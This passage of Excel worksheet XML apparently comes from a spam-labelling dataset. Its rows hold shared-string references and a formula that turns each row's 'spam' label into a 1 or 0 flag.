    <row r="1139" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1139" t="s">
        <v>6405</v>
      </c>
      <c r="B1139" t="s">
        <v>5294</v>
      </c>
      <c r="C1139" s="1">
        <f>IF(B1139="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1140" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1140" t="s">
        <v>6406</v>
      </c>
      <c r="B1140" t="s">
        <v>5294</v>
      </c>
      <c r="C1140" s="1">
        <f>IF(B1140="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1141" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1141" t="s">
        <v>5698</v>
      </c>
      <c r="B1141" t="s">
        <v>5294</v>
      </c>
      <c r="C1141" s="1">
        <f>IF(B1141="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1142" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1142" t="s">
        <v>6407</v>
      </c>
      <c r="B1142" t="s">
        <v>5294</v>
      </c>
      <c r="C1142" s="1">
        <f>IF(B1142="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1143" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1143" t="s">
        <v>6408</v>
      </c>
      <c r="B1143" t="s">
        <v>5297</v>
      </c>
      <c r="C1143" s="1">
        <f>IF(B1143="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1144" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1144" t="s">
        <v>6409</v>
      </c>
      <c r="B1144" t="s">
        <v>5294</v>
      </c>
      <c r="C1144" s="1">
        <f>IF(B1144="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1145" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1145" t="s">
        <v>6410</v>
      </c>
      <c r="B1145" t="s">
        <v>5294</v>
      </c>
      <c r="C1145" s="1">
        <f>IF(B1145="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1146" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1146" t="s">
        <v>6411</v>
      </c>
      <c r="B1146" t="s">
        <v>5294</v>
      </c>
      <c r="C1146" s="1">
        <f>IF(B1146="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1147" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1147" t="s">
        <v>6412</v>
      </c>
      <c r="B1147" t="s">
        <v>5297</v>
      </c>
      <c r="C1147" s="1">
        <f>IF(B1147="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1148" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1148" t="s">
        <v>6413</v>
      </c>
      <c r="B1148" t="s">
        <v>5294</v>
      </c>
      <c r="C1148" s="1">
        <f>IF(B1148="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1149" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1149" t="s">
        <v>6414</v>
      </c>
      <c r="B1149" t="s">
        <v>5294</v>
      </c>
      <c r="C1149" s="1">
        <f>IF(B1149="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1150" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1150" t="s">
        <v>6415</v>
      </c>
      <c r="B1150" t="s">
        <v>5294</v>
      </c>
      <c r="C1150" s="1">
        <f>IF(B1150="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1151" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1151" t="s">
        <v>6416</v>
      </c>
      <c r="B1151" t="s">
        <v>5294</v>
      </c>
      <c r="C1151" s="1">
        <f>IF(B1151="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1152" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1152" t="s">
        <v>6417</v>
      </c>
      <c r="B1152" t="s">
        <v>5294</v>
      </c>
      <c r="C1152" s="1">
        <f>IF(B1152="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1153" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1153" t="s">
        <v>5376</v>
      </c>
      <c r="B1153" t="s">
        <v>5294</v>
      </c>
      <c r="C1153" s="1">
        <f>IF(B1153="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1154" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1154" t="s">
        <v>6418</v>
      </c>
      <c r="B1154" t="s">
        <v>5294</v>
      </c>
      <c r="C1154" s="1">
        <f>IF(B1154="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1155" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1155" t="s">
        <v>6419</v>
      </c>
      <c r="B1155" t="s">
        <v>5297</v>
      </c>
      <c r="C1155" s="1">
        <f>IF(B1155="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1156" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1156" t="s">
        <v>6420</v>
      </c>
      <c r="B1156" t="s">
        <v>5294</v>
      </c>
      <c r="C1156" s="1">
        <f>IF(B1156="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1157" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1157" t="s">
        <v>6421</v>
      </c>
      <c r="B1157" t="s">
        <v>5294</v>
      </c>
      <c r="C1157" s="1">
        <f>IF(B1157="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1158" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1158" t="s">
        <v>6422</v>
      </c>
      <c r="B1158" t="s">
        <v>5294</v>
      </c>
      <c r="C1158" s="1">
        <f>IF(B1158="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1159" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1159" t="s">
        <v>6423</v>
      </c>
      <c r="B1159" t="s">
        <v>5294</v>
      </c>
      <c r="C1159" s="1">
        <f>IF(B1159="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1160" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1160" t="s">
        <v>6424</v>
      </c>
      <c r="B1160" t="s">
        <v>5294</v>
      </c>
      <c r="C1160" s="1">
        <f>IF(B1160="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1161" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1161" t="s">
        <v>6425</v>
      </c>
      <c r="B1161" t="s">
        <v>5294</v>
      </c>
      <c r="C1161" s="1">
        <f>IF(B1161="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1162" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1162" t="s">
        <v>6426</v>
      </c>
      <c r="B1162" t="s">
        <v>5294</v>
      </c>
      <c r="C1162" s="1">
        <f>IF(B1162="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1163" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1163" t="s">
        <v>6427</v>
      </c>
      <c r="B1163" t="s">
        <v>5294</v>
      </c>
      <c r="C1163" s="1">
        <f>IF(B1163="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1164" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1164" t="s">
        <v>5298</v>
      </c>
      <c r="B1164" t="s">
        <v>5297</v>
      </c>
      <c r="C1164" s="1">
        <f>IF(B1164="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1165" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1165" t="s">
        <v>5530</v>
      </c>
      <c r="B1165" t="s">
        <v>5294</v>
      </c>
      <c r="C1165" s="1">
        <f>IF(B1165="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1166" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1166" t="s">
        <v>6428</v>
      </c>
      <c r="B1166" t="s">
        <v>5294</v>
      </c>
      <c r="C1166" s="1">
        <f>IF(B1166="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1167" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1167" t="s">
        <v>6429</v>
      </c>
      <c r="B1167" t="s">
        <v>5294</v>
      </c>
      <c r="C1167" s="1">
        <f>IF(B1167="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1168" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1168" t="s">
        <v>6430</v>
      </c>
      <c r="B1168" t="s">
        <v>5294</v>
      </c>
      <c r="C1168" s="1">
        <f>IF(B1168="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1169" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1169" t="s">
        <v>6431</v>
      </c>
      <c r="B1169" t="s">
        <v>5294</v>
      </c>
      <c r="C1169" s="1">
        <f>IF(B1169="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1170" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1170" t="s">
        <v>6432</v>
      </c>
      <c r="B1170" t="s">
        <v>5294</v>
      </c>
      <c r="C1170" s="1">
        <f>IF(B1170="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1171" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1171" t="s">
        <v>6433</v>
      </c>
      <c r="B1171" t="s">
        <v>5294</v>
      </c>
      <c r="C1171" s="1">
        <f>IF(B1171="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1172" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1172" t="s">
        <v>6434</v>
      </c>
      <c r="B1172" t="s">
        <v>5294</v>
      </c>
      <c r="C1172" s="1">
        <f>IF(B1172="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1173" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1173" t="s">
        <v>6435</v>
      </c>
      <c r="B1173" t="s">
        <v>5297</v>
      </c>
      <c r="C1173" s="1">
        <f>IF(B1173="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1174" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1174" t="s">
        <v>6436</v>
      </c>
      <c r="B1174" t="s">
        <v>5294</v>
      </c>
      <c r="C1174" s="1">
        <f>IF(B1174="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1175" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1175" t="s">
        <v>6437</v>
      </c>
      <c r="B1175" t="s">
        <v>5294</v>
      </c>
      <c r="C1175" s="1">
        <f>IF(B1175="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1176" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1176" t="s">
        <v>6438</v>
      </c>
      <c r="B1176" t="s">
        <v>5294</v>
      </c>
      <c r="C1176" s="1">
        <f>IF(B1176="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1177" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1177" t="s">
        <v>6439</v>
      </c>
      <c r="B1177" t="s">
        <v>5294</v>
      </c>
      <c r="C1177" s="1">
        <f>IF(B1177="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1178" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1178" t="s">
        <v>6440</v>
      </c>
      <c r="B1178" t="s">
        <v>5294</v>
      </c>
      <c r="C1178" s="1">
        <f>IF(B1178="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1179" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1179" t="s">
        <v>6441</v>
      </c>
      <c r="B1179" t="s">
        <v>5294</v>
      </c>
      <c r="C1179" s="1">
        <f>IF(B1179="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1180" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1180" t="s">
        <v>6442</v>
      </c>
      <c r="B1180" t="s">
        <v>5294</v>
      </c>
      <c r="C1180" s="1">
        <f>IF(B1180="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1181" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1181" t="s">
        <v>6443</v>
      </c>
      <c r="B1181" t="s">
        <v>5294</v>
      </c>
      <c r="C1181" s="1">
        <f>IF(B1181="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1182" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1182" t="s">
        <v>6444</v>
      </c>
      <c r="B1182" t="s">
        <v>5294</v>
      </c>
      <c r="C1182" s="1">
        <f>IF(B1182="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1183" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1183" t="s">
        <v>6445</v>
      </c>
      <c r="B1183" t="s">
        <v>5294</v>
      </c>
      <c r="C1183" s="1">
        <f>IF(B1183="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1184" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1184" t="s">
        <v>6446</v>
      </c>
      <c r="B1184" t="s">
        <v>5294</v>
      </c>
      <c r="C1184" s="1">
        <f>IF(B1184="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1185" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1185" t="s">
        <v>6447</v>
      </c>
      <c r="B1185" t="s">
        <v>5294</v>
      </c>
      <c r="C1185" s="1">
        <f>IF(B1185="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1186" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1186" t="s">
        <v>6448</v>
      </c>
      <c r="B1186" t="s">
        <v>5294</v>
      </c>
      <c r="C1186" s="1">
        <f>IF(B1186="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1187" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1187" t="s">
        <v>6449</v>
      </c>
      <c r="B1187" t="s">
        <v>5294</v>
      </c>
      <c r="C1187" s="1">
        <f>IF(B1187="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1188" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1188" t="s">
        <v>6450</v>
      </c>
      <c r="B1188" t="s">
        <v>5294</v>
      </c>
      <c r="C1188" s="1">
        <f>IF(B1188="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1189" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1189" t="s">
        <v>6451</v>
      </c>
      <c r="B1189" t="s">
        <v>5294</v>
      </c>
      <c r="C1189" s="1">
        <f>IF(B1189="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1190" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1190" t="s">
        <v>6452</v>
      </c>
      <c r="B1190" t="s">
        <v>5294</v>
      </c>
      <c r="C1190" s="1">
        <f>IF(B1190="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1191" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1191" t="s">
        <v>6453</v>
      </c>
      <c r="B1191" t="s">
        <v>5294</v>
      </c>
      <c r="C1191" s="1">
        <f>IF(B1191="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1192" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1192" t="s">
        <v>6454</v>
      </c>
      <c r="B1192" t="s">
        <v>5294</v>
      </c>
      <c r="C1192" s="1">
        <f>IF(B1192="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1193" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1193" t="s">
        <v>6455</v>
      </c>
      <c r="B1193" t="s">
        <v>5294</v>
      </c>
      <c r="C1193" s="1">
        <f>IF(B1193="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1194" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1194" t="s">
        <v>6456</v>
      </c>
      <c r="B1194" t="s">
        <v>5294</v>
      </c>
      <c r="C1194" s="1">
        <f>IF(B1194="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1195" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1195" t="s">
        <v>6457</v>
      </c>
      <c r="B1195" t="s">
        <v>5297</v>
      </c>
      <c r="C1195" s="1">
        <f>IF(B1195="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1196" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1196" t="s">
        <v>6458</v>
      </c>
      <c r="B1196" t="s">
        <v>5294</v>
      </c>
      <c r="C1196" s="1">
        <f>IF(B1196="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1197" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1197" t="s">
        <v>6459</v>
      </c>
      <c r="B1197" t="s">
        <v>5297</v>
      </c>
      <c r="C1197" s="1">
        <f>IF(B1197="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1198" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1198" t="s">
        <v>6460</v>
      </c>
      <c r="B1198" t="s">
        <v>5294</v>
      </c>
      <c r="C1198" s="1">
        <f>IF(B1198="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1199" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1199" t="s">
        <v>5998</v>
      </c>
      <c r="B1199" t="s">
        <v>5294</v>
      </c>
      <c r="C1199" s="1">
        <f>IF(B1199="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1200" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1200" t="s">
        <v>6461</v>
      </c>
      <c r="B1200" t="s">
        <v>5294</v>
      </c>
      <c r="C1200" s="1">
        <f>IF(B1200="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1201" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1201" t="s">
        <v>6462</v>
      </c>
      <c r="B1201" t="s">
        <v>5294</v>
      </c>
      <c r="C1201" s="1">
        <f>IF(B1201="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1202" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1202" t="s">
        <v>6463</v>
      </c>
      <c r="B1202" t="s">
        <v>5294</v>
      </c>
      <c r="C1202" s="1">
        <f>IF(B1202="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1203" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1203" t="s">
        <v>6464</v>
      </c>
      <c r="B1203" t="s">
        <v>5294</v>
      </c>
      <c r="C1203" s="1">
        <f>IF(B1203="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1204" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1204" t="s">
        <v>6465</v>
      </c>
      <c r="B1204" t="s">
        <v>5294</v>
      </c>
      <c r="C1204" s="1">
        <f>IF(B1204="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1205" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1205" t="s">
        <v>6466</v>
      </c>
      <c r="B1205" t="s">
        <v>5294</v>
      </c>
      <c r="C1205" s="1">
        <f>IF(B1205="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1206" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1206" t="s">
        <v>6467</v>
      </c>
      <c r="B1206" t="s">
        <v>5297</v>
      </c>
      <c r="C1206" s="1">
        <f>IF(B1206="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1207" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1207" t="s">
        <v>6468</v>
      </c>
      <c r="B1207" t="s">
        <v>5294</v>
      </c>
      <c r="C1207" s="1">
        <f>IF(B1207="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1208" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1208" t="s">
        <v>6469</v>
      </c>
      <c r="B1208" t="s">
        <v>5297</v>
      </c>
      <c r="C1208" s="1">
        <f>IF(B1208="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1209" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1209" t="s">
        <v>6470</v>
      </c>
      <c r="B1209" t="s">
        <v>5294</v>
      </c>
      <c r="C1209" s="1">
        <f>IF(B1209="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1210" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1210" t="s">
        <v>6471</v>
      </c>
      <c r="B1210" t="s">
        <v>5294</v>
      </c>
      <c r="C1210" s="1">
        <f>IF(B1210="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1211" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1211" t="s">
        <v>6472</v>
      </c>
      <c r="B1211" t="s">
        <v>5294</v>
      </c>
      <c r="C1211" s="1">
        <f>IF(B1211="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1212" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1212" t="s">
        <v>6473</v>
      </c>
      <c r="B1212" t="s">
        <v>5294</v>
      </c>
      <c r="C1212" s="1">
        <f>IF(B1212="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1213" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1213" t="s">
        <v>6474</v>
      </c>
      <c r="B1213" t="s">
        <v>5294</v>
      </c>
      <c r="C1213" s="1">
        <f>IF(B1213="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1214" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1214" t="s">
        <v>6475</v>
      </c>
      <c r="B1214" t="s">
        <v>5294</v>
      </c>
      <c r="C1214" s="1">
        <f>IF(B1214="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1215" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1215" t="s">
        <v>6476</v>
      </c>
      <c r="B1215" t="s">
        <v>5294</v>
      </c>
      <c r="C1215" s="1">
        <f>IF(B1215="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1216" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1216" t="s">
        <v>6477</v>
      </c>
      <c r="B1216" t="s">
        <v>5294</v>
      </c>
      <c r="C1216" s="1">
        <f>IF(B1216="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1217" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1217" t="s">
        <v>6478</v>
      </c>
      <c r="B1217" t="s">
        <v>5294</v>
      </c>
      <c r="C1217" s="1">
        <f>IF(B1217="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1218" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1218" t="s">
        <v>6479</v>
      </c>
      <c r="B1218" t="s">
        <v>5297</v>
      </c>
      <c r="C1218" s="1">
        <f>IF(B1218="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1219" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1219" t="s">
        <v>6480</v>
      </c>
      <c r="B1219" t="s">
        <v>5294</v>
      </c>
      <c r="C1219" s="1">
        <f>IF(B1219="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1220" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1220" t="s">
        <v>6481</v>
      </c>
      <c r="B1220" t="s">
        <v>5294</v>
      </c>
      <c r="C1220" s="1">
        <f>IF(B1220="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1221" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1221" t="s">
        <v>6482</v>
      </c>
      <c r="B1221" t="s">
        <v>5294</v>
      </c>
      <c r="C1221" s="1">
        <f>IF(B1221="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1222" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1222" t="s">
        <v>6483</v>
      </c>
      <c r="B1222" t="s">
        <v>5297</v>
      </c>
      <c r="C1222" s="1">
        <f>IF(B1222="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1223" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1223" t="s">
        <v>6484</v>
      </c>
      <c r="B1223" t="s">
        <v>5294</v>
      </c>
      <c r="C1223" s="1">
        <f>IF(B1223="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1224" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1224" t="s">
        <v>6485</v>
      </c>
      <c r="B1224" t="s">
        <v>5294</v>
      </c>
      <c r="C1224" s="1">
        <f>IF(B1224="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1225" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1225" t="s">
        <v>6486</v>
      </c>
      <c r="B1225" t="s">
        <v>5294</v>
      </c>
      <c r="C1225" s="1">
        <f>IF(B1225="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1226" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1226" t="s">
        <v>5453</v>
      </c>
      <c r="B1226" t="s">
        <v>5297</v>
      </c>
      <c r="C1226" s="1">
        <f>IF(B1226="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1227" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1227" t="s">
        <v>6487</v>
      </c>
      <c r="B1227" t="s">
        <v>5294</v>
      </c>
      <c r="C1227" s="1">
        <f>IF(B1227="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1228" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1228" t="s">
        <v>6488</v>
      </c>
      <c r="B1228" t="s">
        <v>5297</v>
      </c>
      <c r="C1228" s="1">
        <f>IF(B1228="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1229" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1229" t="s">
        <v>6489</v>
      </c>
      <c r="B1229" t="s">
        <v>5294</v>
      </c>
      <c r="C1229" s="1">
        <f>IF(B1229="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1230" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1230" t="s">
        <v>6490</v>
      </c>
      <c r="B1230" t="s">
        <v>5297</v>
      </c>
      <c r="C1230" s="1">
        <f>IF(B1230="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1231" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1231" t="s">
        <v>6491</v>
      </c>
      <c r="B1231" t="s">
        <v>5294</v>
      </c>
      <c r="C1231" s="1">
        <f>IF(B1231="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1232" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1232" t="s">
        <v>6492</v>
      </c>
      <c r="B1232" t="s">
        <v>5294</v>
      </c>
      <c r="C1232" s="1">
        <f>IF(B1232="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1233" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1233" t="s">
        <v>6493</v>
      </c>
      <c r="B1233" t="s">
        <v>5294</v>
      </c>
      <c r="C1233" s="1">
        <f>IF(B1233="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1234" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1234" t="s">
        <v>6494</v>
      </c>
      <c r="B1234" t="s">
        <v>5294</v>
      </c>
      <c r="C1234" s="1">
        <f>IF(B1234="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1235" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1235" t="s">
        <v>6495</v>
      </c>
      <c r="B1235" t="s">
        <v>5294</v>
      </c>
      <c r="C1235" s="1">
        <f>IF(B1235="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1236" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1236" t="s">
        <v>6496</v>
      </c>
      <c r="B1236" t="s">
        <v>5294</v>
      </c>
      <c r="C1236" s="1">
        <f>IF(B1236="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1237" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1237" t="s">
        <v>5797</v>
      </c>
      <c r="B1237" t="s">
        <v>5294</v>
      </c>
      <c r="C1237" s="1">
        <f>IF(B1237="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1238" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1238" t="s">
        <v>6497</v>
      </c>
      <c r="B1238" t="s">
        <v>5294</v>
      </c>
      <c r="C1238" s="1">
        <f>IF(B1238="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1239" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1239" t="s">
        <v>6498</v>
      </c>
      <c r="B1239" t="s">
        <v>5294</v>
      </c>
      <c r="C1239" s="1">
        <f>IF(B1239="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1240" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1240" t="s">
        <v>6499</v>
      </c>
      <c r="B1240" t="s">
        <v>5294</v>
      </c>
      <c r="C1240" s="1">
        <f>IF(B1240="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1241" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1241" t="s">
        <v>6500</v>
      </c>
      <c r="B1241" t="s">
        <v>5294</v>
      </c>
      <c r="C1241" s="1">
        <f>IF(B1241="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1242" t="s">
        <v>6501</v>
      </c>
      <c r="B1242" t="s">
        <v>5294</v>
      </c>
      <c r="C1242" s="1">
        <f>IF(B1242="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
